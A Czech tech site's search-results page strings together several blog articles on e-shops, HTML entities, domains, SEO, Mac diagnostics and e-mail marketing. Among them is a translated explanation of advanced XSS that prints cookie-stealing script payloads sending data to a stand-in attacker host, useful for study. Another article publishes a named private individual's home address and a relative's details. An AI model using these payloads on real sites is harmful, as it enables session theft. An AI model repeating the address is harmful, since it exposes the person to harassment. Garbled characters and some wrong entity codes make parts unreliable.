Výsledky vyhledávání v sekci E-shopy a šablony na dotaz reference ����slo

Vyzkoušel jsem Webareal

access_time11.červen 2019personZdenek Slavik

Už je to nějaký ten pátek, co jsem zde na Kecy k věci.cz zveřejnil seznam poskytovatelů e-shopových řešení a jelikož jsem si dlouho nevyzkoušel nějaké to řešení, tak jsem se to rozhodl dnes napravit a vyzkoušet e-shopový systém jménem Webareal, který je od Bohemiasoft s.r.o. Tento systém jsem si nevybral náhodou a vedlo mě k tomu hned několik důvodů, jako porovnání s dosti totožným produktem (Eshop-rychle) od stejné firmy, který jsem již zkoušel. Další důvod byl ten, že jsem za poslední dobu zaznamenal i několik nasazených novinek v tomto systému (krom nových funkcí i nové grafické šablony).Co se týká administrace, tak u té platí to samé, co jsem psal již výše, je stejná jako u Eshop-rychle, tedy nabitá funkcemi a snadno pochopitelná opravdu pro každého. Mohl bych jí zde sice detailněji rozebrat a popsat, jenže jsem toho názoru, že lepší je, když si to každý vyzkouší přímo sám a hned uvidí, jestli mu to vyhovuje, nebo nikoliv.Vyzkoušení je na 15 dní zdarma, bez jakýchkoliv budoucích závazků, takže se každý zájemce o tento systém může dokonale vyřádit. Navíc administrace obsahuje i dostatečné množství nápověd, tak se nemusí nikdo ničeho opravdu bát. Když vás toto řešení zaujme a budete ho chtít využívat, tak stačí v administraci kliknout na modré tlačítko OBJEDNAT OSTRÝ PROVOZ ;-).Když bych Webareal měl nějak celkově ohodnotit, tak bych celkově řekl, že za poměrně málo peněz dostanete hodně muziky. Systém se neustále vyvíjí a veškeré aktualizace jsou automaticky pro všechny uživatele zdarma, takže pronájmem získáte moderní řešení, které využívá již více jak 13 000 zákazníků.Systém nabízí velké množství grafických šablon (vzhledů), které jsou již v ceně, jdou i různě editovat, použít můžete i vlastní soubor CSS, takže by teoreticky šlo nasadit jen vlastní logo a pozměněnou hlavičku a už fungujete. Kdyby vám toto nestačilo a chtěli by jste se více odlišit od ostatních, tak je možno nasadit i přímo vlastní design.No a na závěr bych řekl asi toto: Systém jsem zhodnotil tak, jak to vidím já, tedy, jako pouhý šťoura, co rád testuje cokoliv a pak o tom rád objektivně napíše. Nejsem tedy přímo uživatel daného řešení. Pokud máte s tímto řešením nějaké zkušenosti (ať už kladné, či záporné) i vy, tak budu rád, pokud se o ně podělíte pomocí komentáře a pomůžete tak ostatním návštěvníkům ;-).

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Webové stránky na dotaz reference ����slo

Jak psát znaky

access_time24.květen 2020personRedakce

Přehled znaků, které zde můžeme použít, už máme, teď by tochtělo ještě vědět, jak je napsat, když nemají svůj čudlík naklávesnici. Jej jich málo, bude to jednoduché.První způsob je prostý. Otevřít si ve windowsech mapuznaků, v ní nastavit svůj font (druh písma) a pak už jen klikatna vybraná písmena, na tlačítko "vybrat" a "kopírovat" a potéCtrl+V (čili "vložit") do textu na místo, kde má znak být. Mocklikání.Další způsob je klávesovými zkratkami. Čili za použitíkombinací kláves, které máme, se písmeno jaksi samo napíše.Třetí způsob je pomocí numerického označení písmene vsystému. Při stisku ALT-GR (nebo chcete-li PRAVÉHO ALTu) se vyťukásprávné číslo (několikamístné) a po uvolnění klávesy alt mámežádaný znak. Doposud jsem mluvila o prostém napsání do textu, čilitřeba do wordu.Nanotebooku mi to ale funguje trochu jinak, protože tam nemámčíselnici, což situaci komplikuje. Když chci napsat číslo, musím hopsát horními klávesami při stisknutém shiftu. Když chci psát pouzečísla, mohu si klávesou FN zaktivovat NUM-LOCK a použít ty klávesys malými modrými čísélky (jenomže pak čísla nemohu kombinovat stextem). Při těchto podmínkách mi uvedené číselné označení fungujepři stisknutí LEVÉHO ALTu. A někdy mohu použít trojhmat FN + ALT +malé modré číslo.Ale když chci napsat totéž do html, mám další možnost. Podobnějako se zapisují barvy (pamatujete? "# + šestimístné číslo") sezapisují i znaky. Jenom numerický zápis v html (neboli num-code) je ve tvaru "&# + několikamístné-číslo + ;",to aby počítač věděl, co si o tom má myslet a že má ukázat danýznak.A pak tu máme ještě "pojmenované znaky" pro nás, pro lidi,protože slova se pamatují lépe než čísla. Čili html-entita je ve tvaru "&# + nějaký-text + ;".Teta Wiki mi řekla (pro lepšízapamatování), že písmena s čárkou mají u sebe "acute" a písmena sháčkem mají u sebe "caron".Příklad: é = é ě = ěPŘEHLED POUŽITELNÝCH ZNAKŮ V TOMTO BLOGU A JAK JE NAPSAT:Záměrně zde vynechávám základní číslice a písmena, která se píšíbez problému přímo (62) a uvádím zde "jiné" znaky (147). Plnozbytečných písmen s ocáskem a na to, co by člověk skutečněpotřeboval, není místo - kdyby si tak šlo vybrat!.Růžově vyznačenézkratky zde nelze použít pro psaní, protože vyvolávají jinoufunkci.Žlutěznaknázev znakuklávesovázkratkanumerickéoznačení(při stiskuALT-GR)num-codehtml-entita!vykřičníkSHIFT + §33&#33; "uvozovkySHIFT + ů38&#38;&quot;#označení číslaCTRL + ALT + x35&#35; $dolar 36&#36; %procentoSHIFT + =37&#37; &ampersandALT-GR + c38&#38;&amp;'apostrof 39&#39; (levá okrouhlá závorkaSHIFT + )40&#40; )pravá okrouhlá závorka 41&#41; *hvězdičkaALT-GR + -42&#42; +plus 43&#43; ,interpunkční čárka 44&#44; -spojovník 45&#45; .tečka 46&#46; /lomítkoSHIFT + ú47&#47; :dvojtečkaSHIFT + .58&#58; ;středník 59&#59; <menší nežALT-GR + ,60&#60;&lt;=rovnítko 61&#61; >větší nežALT-GR + .62&#62;&gt;?otazníkSHIFT + ,63&#63; @komerční atALT-GR + v64&#64; [levá hranatá závorkaALT-GR + f91&#91; \obrácené lomítkoALT-GR + g92&#92; ]pravá hranatá závorkaALT-GR + g93&#93; ^vokáň 94&#94; _čára dole 95&#95; `přízvuk 96&#96; {levá složená závorkaALT-GR + b123&#123; |svislá čáraALT-GR + w124&#124; }pravá složená závorkaALT-GR + n125&#124; ~tilda 126&#125;  tvrdá mezera 2550160&#160;&nbsp;¤měna 2070164&#164;&curren;¦přerušená svislá čára 0166&#166;&brvbar;§paragraf 210167&#167;&sect;©copyright 0169&#169;&copy;«dvojité lomenéuvozovky vlevo 1740171&#171;&laquo;¬logický zápor 1700172&#172;&not;®registrace 0174&#174;&reg;°stupeňSHIFT + ;2480176&#176;&deg;±plus minus 0177&#177;&plusmn;µmikro 0181&#181;&micro;¶odstavec 200182&#182;&para;·tečka uprostřed 0183 &middot;»dvojité lomenéuvozovky vpravo 0187 &raquo;×násobení 1580215 &times;ßmalé ostré s 2250223 &szlig;÷dělení 0247 &divide;–pomlčka šířky n 0150 &ndash;—pomlčka šířky m 0151 &mdash;†kříž 0134 &dagger;‡dvojitý kříž 0135 &Dagger;•černý puntík 0149 &bull;…tři tečky 0133 &hellip;‰promile 0137 &permil;‹levá ostrá závorka 0139 &lsaquo;›pravá ostrá závorka 0155 &rsaquo;€euro 0128 &euro;™obchodní značka 0153 &trade;  

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz reference ����slo

I ajťáci raději konspirují, aneb kdo je Pavel Šimon

access_time13.květen 2019personRedakce

Když už jsme u toho, Pavel Šimon je pro většinu IT společnosti pohybující se v otázkách internetového bussinessu obyčejný sprostý spekulant a pro některé i zloděj . Jeho profil investora je docela zajímavý.Pavel Šimon je nejznámější doménový investor, chcete-li spekulant, u nás. Jeho postava je obestřena rouškou tajemství. Někteří tvrdí, že je to jen smyšlená postava, někdo zase, že je to alias Fandora, ať tak či onak, jedná se pravděpodobně o držitele jednoho z nejcennějších portfolií v České republice.Pavel Šimon začal s doménami brzy, řekl bych někdy v roce 2001 a velice rychle si získal pozornost. Díky tehdejším pravidlům bylo možné si registrovat domény a zaplatit je až později ve lhůtě 2,5 měsíce, tímto způsobem šlo zaregistrovat neomezený počat domén, pokud doména nebyla uhrazena tak propadla a byla znovu volná, Pavel Šimon již tehdy používal skript na odchytávání, takže doména byla volná jen několik sekund po té znovu registrována na 2,5 měsíce zdarma. Tímto blokoval tisíce domén. Získal tím značnou mediální pozornost, nutno dodat, že tento obchodní model budil značnou kontroverzi, na druhou stranu jeho činnost nebyla nelegální (prostě chyba systému) a nebyl jediný kdo to takto praktikoval.Změna stavu přišla až na konci roku 2003, v této době bych řekl, že už měl vytvořený dostatečný kapitál na to, aby si mohl dovolit držet větší počet domén (připomínám, že v roce 2000 stála registrace domény 1600 Kč a prodlužovaní poplatek pak 800 Kč na rok, udržování i malého portfolia bylo značně nákladné). Pavel Šimon nepřestal být aktivní ani po této době, svědčí o tom například ThajskeMaseze.cz z roku 2007 nebo nákup domény Vtipy.cz od OCT Network (doména vtipy.cz odchytnul). Jeho tisícové portfolio obsahuje také překlepové a trademark domény, paradoxně, ale tyto domény nejsou parkovány, takže úplně nevidím smysl v jejich držení, vlastně žádná adresa v jeho portfoliu není parkována (ani ty generické), čímž se hrubým odhadem připravuje asi o 50 000+ Kč měsíčně (Webtržníci hovoří i o 100 000 + Kč).Jeho investiční model se nedá napodobit, protože je založen na brzkém vstupu do odvětví a uvědomení si ceny těchto virtuálních realit v době, kdy tomu věřilo jen málo lidí. Pan Šimon je stále aktivním, přihazuje na Daukci (koupil tam například InzertWeb.cz). Jedna z jeho neúspěšných investic je nákup CR domén o kterých se mluvilo na Webtrhu, investice v hrubé výši 150 000 Kč do nejlepších českých slov na Kostarické koncovce CR se však ukázala jako chybná a v současnosti jsou všechny tyto domény volné.Je mi trochu líto, že Pavel Šimon nevystupuje veřejně, neboť informace o jeho doménových prodejích budou stát určitě za to, jediný zaznamenaný prodej, o kterém vím je Sazeni.cz (zdroj: Fandor). Na závěr snad jen říci, že jméno Pavel Šimon hodně lidí leží v žaludku, ovšem většině z nich jen proto, že do doménového světa přišli pozdě a on jim doménu nechtěl prodat levně, co se týče té menšiny, kde vyfoukl jméno firmě po nechtěné expiraci nebo zaregistroval trademark, tak „Kdo jest z vás bez hříchu, nejprv hoď na ni kamenem“ a my všichni musíme na sobě pracovat, aby byl doménový svět lepší (mě nevyjímaje).POZN: Ani po dvou snahách získat komentář k článku p. Šimon neodpověděl. V článku mohou být faktické chyby, neboť jsem v odvětví jen 2 roky, takže prosím o případné upozornění. Začal včas s doménami, a tak začal zabrat lukrativní domény jako brana .cz , hacking. cz , vtipy .cz , zelezarstvi .cz atd. Vzhledem k jeho tajemnosti začala spousta lidí spekulovat, jestli tento člověk vůbec existuje. A tyto spekulace se začaly vířit tak hlasitě, jak bych to od IT komunity která by měla být zvyklá si všechno ověřovat nečekal.Jak najít kdo je Pavel Šimon totiž bylo snadné a určitě to není výkon, za který bych si zasloužil nějak dlouhý potlesk. Boreček tedy rozhodně nejsem. Budu zde v článku pracovat přímo s konkrétními údaji, rozhodně ale nechci abyste je nějak zneužili, kdo je ale psychopat už by si je stejně našel sám .Jako první při hledání Pavla Šimona sem se podíval na registr domén a vyzkoušel jednu z domén jeho portfolia. Okamžitě jsem se dozvěděl jeho adresu, která zní Nevanova 1059, 163 00, Praha. Protože jsem chtěl vědět jestli je adresa pravá, použil jsem mapy. A na mapě už se mi rovnou objevil jeho dům. Ano, skutečně existuje, a ve firmách na příslušné adrese se mi dokonce objevil jakýsi David Šimon který dělá alarmy. Jen sem si říkal, že když je příbuzný s Pavlem Šimonem, určitě má doménu alarmy .cz – a fakt! Ještě sem Davida ověřil v živnostenském rejstříku a zjistil, že opravdu tedy existuje i zde. Ještě sem v něm ověřil i Pavla.Tak vidíte, nebyla to akce hodná akce Jamese Bonda a další konspirační teorie byla odstraněna .

folder_openPřiřazené štítky

Doména pro www stránku jak si správně vybrat

access_time21.březen 2020personRedakce

Podíváme se na to, jak správně si vybrat doménu pro Vaši webovou stránku. Nejdříve co znamená lidsky doména. Doména pro www stránku neboli jméno internetové stránky je označení pro snadné nalezení na internetu. Jestli znáte doménu nějaké webové prezentace, tak stačí jí zadat v prohlížeči a hned se Vám objeví požadovaná stránka. Každá webová stránka má vlastní unikátní doménu. V průběhu tvorby webových stránek by se mělo řádně promyslet jaký název by měla internetová stránka dostat, aby se předešlo zbytečným problémům.Doména musí být jednoducháVybrat doménu Vám pomůže společnost, která se zabývá prodejem domén. Na jejich stránkách máte políčko kam zadáte název a hned se Vám ukáže jestli je doména volná nebo už je obsazená. Před zakoupením jména pro Vaší budoucí internetovou stránku dbejte na to, aby byl název jednoduchý, jednoduše zapamatovatelný a aby nenastal problém ji sdělit klientovi přes telefon. Doména by neměla být zbytečně dlouhá, aby se nemusela zapisovat a byla lehce zapamatovatelná. Použití názvu firmy v doméně je nejlepší způsob jak podtrhnou svojí identitu.Myslete do budoucna při výběru doményV případě že jste menší firma, nezapomínejte na to, že jednou můžete být velká společnost a proto doporučujeme pořídit si nejenom doménu s koncovkou .cz ale i jinou jako je .com .net a další. Důvod je jednoduchý a to ten že v případě, že si budete chtít pořídit stejný název pro Vaší doménu bude obsazena a budete muset zaplatit hodně peněz za odkoupení od člověka, který ji sice nepotřebuje, ale s pomocí Vás si vydělá. V případě že pracujete mezinárodně taktéž doporučujeme si pořídit domény se stejným názvem, ale s koncovkou jiných státu jako například .de pro Německo, .ru pro Rusko a nebo .sk pro Slovensko.Klíčový slova v názvu doményV dnešní době hodně firem zabývající se optimalizací pro vyhledávače Vám doporučí dát si do domény vyhledávající výrazy. My však tuhle metodu nedoporučujeme, firmy které Vám to doporučí si usnadňují za pomocí tohoto tahu práci, ale nenechte se nachytat. Vezmeme to logicky, v doméně je možné použít jen jedno klíčové slovo, ale to předpokládáme, že Vám nestačí. Doména bude zbytečně dlouhá například „nejlevnejsi-ubytovani-v-chorvatku-split.cz“ a proto nebude snadno zapamatovatelná. Ztrácíte místo pro identifikaci Vaši firmy. A nakonec pro optimalizaci pro vyhledávače je to sice výhodnější a dostanete plus u vyhledávače, ale i když použijete klíčový slova v doméně, ve výsledcích nebudete jenom Vy, ale i konkurence přesto že by měla klíčová slova v doméně.Jak správně vymyslet název doményJak jsem již říkal, je lepší, aby byla doména kratší, ale stává se, že do názvu je třeba dát dvě a více slov, proto doporučujeme dávat mezi slova pomlčky usnadňuje to čtení Vaším klientům a snadněji si doménu zapamatují, například pneuservis-stepanek.cz než pneuservisstepanek.cz. Aby se nestalo, že člověk zadá název, bez pomlčky doporučujeme si pořídit doménu i bez ní a nastavit přesměrování.Firmy nabízející nákup doményVybírejte si společnosti, které už jsou dlouho na trhu, levné služby neznamenají vždy kvalitní služby a v tomto případě obzvlášť. Podívejte se na reference, které má daná společnost. Prozkoumejte a zeptejte se na administrační část k doméně, aby byla možnost snadně nastavit email k doméně a změnu DNS záznamu.Vybírejte doménu bez problémů se zákonemPřed vybráním zkontrolujte jestli vybraný název není patentovaní jako třeba Microsoft nebo Apple. Nebyl by to nejlepší výběr.Lhůta platnosti doményNepromeškejte dobu platnosti domény. Doména se většinou kupuje na jeden rok ale můžete samozřejmě koupit i na delší dobu. Musíte být řádně informováni předem od společnosti která má na starosti Vaší doménu o prodloužení, aby se nestalo to že Vám doménu koupí někdo jiný.Přejeme hodně úspěchu při koupi domény. V případě, že by jste potřebovali pomoci při koupi nebo zřízení domény, můžeme vše prokonzultovat.

folder_openPřiřazené štítky

Jak získat zdarma cenné zpětné odkazy pro svůj e-shop?

access_time20.duben 2020personRedakce

Ať se vám to líbí nebo ne, zpětné odkazy stále hrají prim, a jak to tak vypadá, tak budou důležité i v budoucnu, protože všechny ostatní metriky v podstatě selhávají. Krásným příkladem byl ruský server Yandex.ru, který zrušil hodnocení webových stránek podle zpětných odkazů. Ani ne půl roku na to musel tuto metriku vrátit zpět, protože žádné jiné lepší hodnocení není. No a protože to nyní víte, tak potřebujete začít cíleně budovat zpětné odkazy.Někdo to má holt snazšíNespoléhejte se na to, že vám zákazníci budou dělat zpětné odkazy sami od sebe. Ani náhodou. Tedy pokud neprovozujete e-shop, kam chodí technicky orientovaní lidé, kteří píší vlastní blogy a HTML jim není cizí. V opačných případech pak máte smůlu a za odkazy si budete muset jít sami. Řečeno v jednoduchosti. Ony i ženy dnes píší nejrůznější blogy, kterými se dokonce často i velmi úspěšně živí, ale takových žen je opravdu minimum.Katalogy jako základStejně jako je tento web, tak stejně tak existují i další katalogy, do nichž své weby můžete často zdarma registrovat. Určitě zkuste firmy.cz, nebo velmi oblíbený toplist.cz.Blog není volba, je to povinnostE-shop bez blogu dnes téměř nemá smysl. Na blogu můžete zákazníky upozorňovat na různé produkty, recenze, ale třeba i na cizí informační zdroje. S trochou kreativity se vám určitě podaří napsat pěkný článek, který může získat zpětné odkazy.Spolupráce s blogeryBlogeři jsou velmi důležití, zejména tzv. influeři, což jsou komunitou uznávaní blogeři, kteří na svůj blog pravidelně přivádí tisíce čtenářů lačnících po nových informacích. Až nějaké seženete, kontaktujte je a nabídněte jim spolupráci. Články si buď můžete objednat placené, výměnou za nějaký váš produkt, nebo blogerovi můžete nabídnout exkluzivitu v podobě zapůjčování demo produktů apod. V případě spokojenosti doporučuji s blogerem zůstat v kontaktu. Rozhodně se to vyplatí, protože budete potřebovat více článků.Využívejte všechny sociální sítěToto prosím berte s rezervou. Není tím totiž myšleno to, že máte na všech sociálních sítích zprovoznit firemní stránky, ale že jsou sociální sítě dobré pro získávání zpětných odkazů. Ke svým profilům si v naprosté většině případů můžete dát odkaz na svůj web. Jako ideální se jeví zejména YouTube, na který můžete dávat video recenze s odkazy na váš e-shop.Buďte originálníZpěváci jsou krásným příkladem toho, jak moc je potřeba se odlišit. Vezměte si například takovou Miley Cyrus. Jako mladá byla taková ta hodná a slušná holka, kterou si každý musel zamilovat. Jenže to šlo, když byla malá, jakmile vyrostla, musela se z hodné holky stát zlobivou holkou. No a tak dnes dělá různé vylomeniny, které jí pomáhají zůstat v centru dění a na hlavních stranách bulvárních časopisů. Udělejte to podobně. A pamatujte, i negativní reklama, je také reklama. Jako příklad lze uvést majitele nejmenovaného e-shopu se zbraněmi, který přistěhovalce využil do své reklamy, v které nabízel řešení přistěhovalecké problematiky. Reklama publikovaná na Facebooku ještě ten den obletěla všechna média a dost množná se dostala i do zahraničí. Majitel sice následně dostal pokutu. Na druhou stranu si udělal negativní super reklamu a získal zdarma vysoce hodnotné zpětné odkazy.Placená, za to však dobrá rada – kupování domén v aukcíchO této možnosti moc obchodníků neví, ale je lepší si koupit dobrou doménu v aukci a dát za ní klidně i 10.000 Kč, protože si za tuto směšnou částku kupujete doménu s již třeba několika stovkami zpětných odkazů, nebo exkluzivním doménovým jménem. Vtip je v tom, že za vytvoření odkazového profilu, který nákupem „zdědíte“, ušetříte mnohem více peněz, možná desítky i stovky tisíc korun. No a navíc máte to hned, ne až za rok či dva. Problematika doménových aukcí přesahuje rámec tohoto článku. Zajímá-li vás tato problematika, obraťte se na někoho zkušeného.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Operační systémy a Aplikace na dotaz reference ����slo

Jak použít Apple Diagnózu k řešení Mac probémů

access_time22.květen 2019personRedakce

Ve velmi vzácných případech, a to i přes to, že Apple vybírá pouze kvalitní komponenty, se můžeš setkat s boot problémem, grafickým problémem, případně s něčím jiným, co by ti vadilo při práci s Macem. V této krizové situaci hned nemusíš bežet do Apple Store, ale stačí aby si postupoval podle tohoto návodu, který dokáže vyřešit běžné Mac problémy nebo alespoň poukáže na to, co je špatně.1. Odpoj všechna příslušenstvíAby se vyloučily jakékoli problémy s příslušenstvím připojeným k počítači Mac, je třeba nejprve zajistit, aby všechny externí pevné disky, mikrofony, reproduktory a další příslušenství byly odpojeny od počítače. Připojeny nech pouze monitor, myš a klávesnici a můžeš pokračovat.Pokud zjištíš, že tvůj počítač funguje normálně bez jakéhokoli příslušenství, pak připojuj příslušenství jedno po druhém, dokud nenajdeš příslušenství, které je příčinou problému.2. Spusť Apple Hardware TestRestartuj počítač a drž „D“. Budeš automaticky přesměrován na Apple Diagnostiku. Sleduj průběh diagnostiky a na konci si napiš kódy problémů, které můžeš ukázat pracovníkům v Apple Store. Tady můžeš najít seznam reference kódů.3. Klávesové zkratkyExistuje několik klávesových zkratek, které ti ulehčí orientaci při průběhu diagnostiky.Command + G – Zobrazit příručku ZačínámeCommand + L – Zobrazit obrazovku pro výběr jazykaCommand + R – Opětovné spuštění DiagnostikyS – Vypnout MacR – Restartovat MacPozn. při použití restartu nebo vypnutí, může dojít k mírnému zpoždění příkazu.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Marketing na dotaz reference ����slo

Co není e-mail marketing?

access_time21.březen 2020personRedakce

Chcete-li využívat tzv. e-mail marketing, měli byste vědět, co e-mail marketing rozhodně NENÍ.Na Wikipedii se dozvíte, že „e-mail marketing je cílené rozesílání komerčních i nekomerčních zpráv na přesně stanovený seznam emailových adres. Majitelé emailových adres musí vyžádat a potvrdit zájem o tyto informace. Z tohoto důvodu je email marketing jedním z efektivních nástrojů pro budování one-to-one komunikace. Emailing patří k nejrychleji rostoucí formě elektronické přímé komunikace.“Co není e-mail marketing?V knize Milionový email, do které jsem se začetl, David Kirš uvádí „26 úsměvných bodů, kterým určitě nemůžeme říkat email marketing“. Věřím, že pro Vás budou poučné a třeba si uvědomíte, co by šlo ve vašem e-mail marketingu ještě vylepšit. Věřím, že se na mě David nebude zlobit, když jeho knize udělám malou reklamu. :o)Email marketing není jednorázové odeslání prodejní nabídky služeb nebo produktů na seznam „někde“ získaných kontaktů. Tomu se říká spam.Email marketing není sbírání email adres po internetu. Je jedno, jestli to dělá vaše asistentka nebo chytrý prográmek.Email marketing není ani o kupování databází kontaktů. To je jen lépe zabalený bod 2.Email marketing není jen posílání měsíčního newsletteru.Email marketing není posílání 20 zlevněných produktů s obrázky každý týden.Email marketing není, když se nemůžu z odběru emailů jednoduše odhlásit.Email marketing není, když se v každém emailu prodává horem spodem.Email marketing není, když se minutu dívám na email a nechápu, co mi chcete říct.Email marketing není, když mě zaujalo, co jsem dostal, ale nevím, co mám udělat dál.Email marketing není televize, která chrlí reklamní sdělení plošně na lidi.Email marketing není posílat pořád dokola na neplatné nebo duplicitní adresy.Email marketing není posílat příliš často a obtěžovat.Email marketing není posílat hromadně přes Outlook nebo Gmail.Email marketing není, když vidím jen prázdný email, pokud nemám stažené obrázky.Email marketing není, když nesleduji úspěšnost kampaní a statistiky čtení.Email marketing není, když se neví, proč se email posílá a jaký má cíl.Email marketing není, když se posílá A4 textů.Email marketing není, když se posílají 5 MB přílohy.Email marketing není, když se nevyužívá web na sběr relevantních kontaktů.Email marketing není, když se kontakty nesbírají na prodejně.Email marketing není, když není souhlas se zasíláním.Email marketing není, když není optimalizovaný email pro různé email prohlížeče.Email marketing není, když se posílají stejné emaily pořád dokola ručně.Email marketing není mít po každém mailingu plnou schránku vrácených emailů.Email marketing není, když se zapomíná, že email čte na druhé straně člověk.Email marketing není, když by si odesílatel sám nepřečetl email, který posílá.Tak co? Děláte e-mail marketing, nebo posíláte spamy? ;o)Máte vlastní názor? Vložte nám komentář níže :-)

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz reference ����slo

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny 